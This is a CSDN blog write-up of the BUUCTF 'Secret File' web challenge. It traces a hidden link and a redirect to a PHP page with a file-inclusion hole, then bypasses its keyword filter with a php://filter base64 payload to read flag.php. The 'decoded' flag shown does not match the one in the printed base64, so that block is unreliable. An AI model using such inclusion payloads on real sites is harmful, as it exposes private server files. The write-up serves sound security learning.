BUUCTF WEB [极客大挑战 2019]Secret File

最新推荐文章于 2024-04-25 23:53:57 发布

Y1Daa

最新推荐文章于 2024-04-25 23:53:57 发布

阅读量1.8k

点赞数 1

分类专栏： BUUCTF 文章标签： web安全

本文链接：https://blog.csdn.net/weixin_51412071/article/details/124058495

版权

BUUCTF 专栏收录该内容

43 篇文章 0 订阅

订阅专栏

BUUCTF WEB [极客大挑战 2019]Secret File

启动后效果如下

请添加图片描述

F12查看源代码

<!DOCTYPE html>

<html>

<style type="text/css" >
#master {
    position:absolute;
    left:44%;
    bottom:0;
    text-align :center;
        }
        p,h1 {
                cursor: default;
        }
</style>

        <head>
                <meta charset="utf-8">
                <title>蒋璐源的秘密</title>
        </head>

        <body style="background-color:black;"><br><br><br><br><br><br>

            <h1 style="font-family:verdana;color:red;text-align:center;">你想知道蒋璐源的秘密么？</h1><br><br><br>

            <p style="font-family:arial;color:red;font-size:20px;text-align:center;">想要的话可以给你，去找吧！把一切都放在那里了！</p>
            <a id="master" href="./Archive_room.php" style="background-color:#000000;height:70px;width:200px;color:black;left:44%;cursor:default;">Oh! You found me</a>
            <div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
        </body>
</html>

其中一段代码包含一个跳转链接

<a id="master" href="./Archive_room.php" style="background-color:#000000;height:70px;width:200px;color:black;left:44%;cursor:default;">Oh! You found me</a>

尝试访问Archive_room.php

请添加图片描述

点击SECRET按钮后自动跳转到end.php中

使用BurpSuite抓包，得知中间会访问action.php。放入Repeater中发送请求包

GET /action.php HTTP/1.1
Host: b1dd1aed-6389-452a-8c8e-8f0363d3f057.node4.buuoj.cn:81
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://b1dd1aed-6389-452a-8c8e-8f0363d3f057.node4.buuoj.cn:81/Archive_room.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

得到响应包如下

HTTP/1.1 302 Found
Server: openresty
Date: Sat, 09 Apr 2022 02:40:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Location: end.php
X-Powered-By: PHP/7.3.11
Content-Length: 63

<!DOCTYPE html>

<html>
<!--
   secr3t.php        
-->
</html>

访问secr3t.php

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

可以看出这是一个文件包含漏洞

关于过滤

<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>

strstr函数
```
strstr(string $haystack, mixed $needle, bool $before_needle = false): string
```
用于查找字符串的首次出现, 返回 haystack 字符串从 needle 第一次出现的位置开始到 haystack 结尾的字符串。

区分大小写

stristr函数

stristr(string $haystack, mixed $needle, bool $before_needle = false): string

作用同strstr,忽略大小。

可见代码过滤了$file变量中的../ tp input data等敏感字符串，其中input data均是用于文件包含漏洞PHP伪协议的关键字。

可以利用filter伪协议进行文件包含读取flag.php文件中的内容

构造payload/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php

得到base64编码的文件内容：

PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7MmZkNzFiODAtYzFmMi00YzdjLWI4YmMtNjQ2NWY5NDg3MWZlfSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=

解密后得到flag

<!DOCTYPE html>

<html>

    <head>
        <meta charset="utf-8">
        <title>FLAG</title>
    </head>

    <body style="background-color:black;"><br><br><br><br><br><br>
        
        <h1 style="font-family:verdana;color:red;text-align:center;">啊哈！你找到我了！可是你看不到我QAQ~~~</h1><br><br><br>
        
        <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
            <?php
                echo "我就在这里";
                $flag = 'flag{3be9e2b1-0e53-48e4-987b-0aacef0c9547}';
                $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
            ?>
        </p>
    </body>

</html>

Y1Daa

关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
1
评论
BUUCTF WEB [极客大挑战 2019]Secret File

BUUCTF WEB [极客大挑战 2019]Secret File启动后效果如下F12查看源代码<!DOCTYPE html><html><style type="text/css" >#master { position:absolute; left:44%; bottom:0; text-align :center; } p,h1 { curso
复制链接

扫一扫